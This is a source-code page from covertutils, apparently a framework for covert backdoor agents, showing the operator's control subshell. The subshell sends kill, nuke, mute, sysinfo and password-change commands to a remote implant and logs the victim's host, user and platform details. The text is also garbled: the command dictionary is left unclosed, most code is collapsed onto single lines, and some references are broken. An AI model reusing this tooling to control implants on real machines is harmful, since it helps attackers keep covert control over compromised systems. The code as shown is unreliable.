Source code for covertutils.shells.subshells.controlsubshell

import json
# from covertutils.payloads.generic.control import Commands as control_commands
from covertutils.shells.subshells import SimpleSubShell

Commands = {
	'reset' : 'R',
	'identity' : 'ID',
	'sysinfo' : 'SI',
	'kill' : 'KI',
	'mute' : 'MU',
	'unmute' : 'UM',
	'nuke' : 'NK',
	'check_sync' : 'CS',
	'sync' : 'Y',
	'chpasswd' : 'PWD',

[docs]def message_handle(message, instance) : if instance.sync_stream : if message == 'OK' : instance.handler.getOrchestrator().reset([instance.sync_stream]) if instance.chpasswd : if message == 'OK' : instance.handler.getOrchestrator().initCrypto(instance.chpasswd) instance.chpasswd = None if instance.sysinfo : # sysinfo_var = message # sysinfo = json.loads(message) sysinfo = message.split('+') instance.message_logger.warn( """ General: Host: {} Machine: {} Version: {} Locale: {} Platform: {} Release: {} System: {} Processor: {} User: {} Specifics: Windows: {} Linux: {} """.format( *sysinfo ) ) # MacOS: {} instance.base_shell.sysinfo = sysinfo instance.sysinfo = False elif instance.check_sync : local_dict = {} orch = instance.handler.getOrchestrator() for stream in orch.getStreams() : local_dict[stream] = orch.getKeyCycles(stream) remote_dict = json.loads(message) output = '' for stream in remote_dict : if stream not in local_dict : self.debug_logger.warn("Stream '%s' exists only in the Agent") # if local decryption key matches the remote encryption and vise-versa encryption_sync = local_dict[stream][0] == remote_dict[stream][1] decryption_sync = local_dict[stream][1] == remote_dict[stream][0] synced = encryption_sync and decryption_sync if synced : output += "[+] Stream '%s' is synchronized at %d - %d cycles\n" % ( stream, local_dict[stream][0], local_dict[stream][1] ) else : output += "[-] Stream '%s' is out-of-sync at '%s' channel\n" % ( stream, "Encryption" if encryption_sync else "Decryption" ) # if instance.sync : instance.message_logger.warn(output) # print "local: " + json.dumps(local_dict) # print "remote: " + message instance.check_sync = False else : instance.message_logger.warn( message )
[docs]class ControlSubShell ( SimpleSubShell ) :
[docs] def __init__( self, stream, handler, queue_dict, base_shell, ignore_messages = set(['X']), prompt_templ = " (>{stream}<) |-> ") : SimpleSubShell.__init__( self, stream, handler, queue_dict, base_shell, ignore_messages, prompt_templ ) self.updatePrompt( ) self.message_function = message_handle self.sysinfo = False self.check_sync = False self.killed = False self.sync_stream = False self.chpasswd = False
[docs] def default( self, line ) : comm, args, line = self.parseline(line) try : command = Commands[comm] except : self.debug_logger.warn( "No such control command [%s]!" % comm) return if command == Commands['sync'] : if len(args) == 0 : self.debug_logger.warn( "No Stream selected!") return stream = args if stream not in self.handler.getOrchestrator().getStreams() : self.debug_logger.warn( "Stream '%s' does not exist!" % stream) return self.sync_stream = stream command = "%s %s" % (command, stream) if command == Commands['chpasswd'] : if len(args) == 0 : self.debug_logger.warn( "No Password selected!") return new_passwd = args self.chpasswd = new_passwd # new_passwd = '1234' command = "%s %s" % (command, new_passwd) if command == Commands['reset'] : self.debug_logger.warn( "Reseting handler" ) self.resetHandler() if command == Commands['sysinfo'] : self.sysinfo = True if command == Commands['kill'] : self.killed = True self.debug_logger.warn( "Sending '%s' control command!" % command ) self.handler.preferred_send( command, ) if self.chpasswd : self.handler.getOrchestrator().initCrypto(self.chpasswd) self.chpasswd = None if command == Commands['check_sync'] : self.check_sync = True
[docs] def resetHandler( self ) : self.handler.reset()
[docs] def completenames( self, text, line, begidx, endidx ) : # print "RUN" comm, args, line = self.parseline(line) # print "pasrsed" complete_list = [] probable_comm = comm # print probable_comm if probable_comm in Commands.keys() : return [] for known_command in Commands.keys() : if known_command.startswith(probable_comm) : complete_list.append( known_command ) return complete_list
[docs] def do_help( self, line ) : commands = Commands.keys() print commands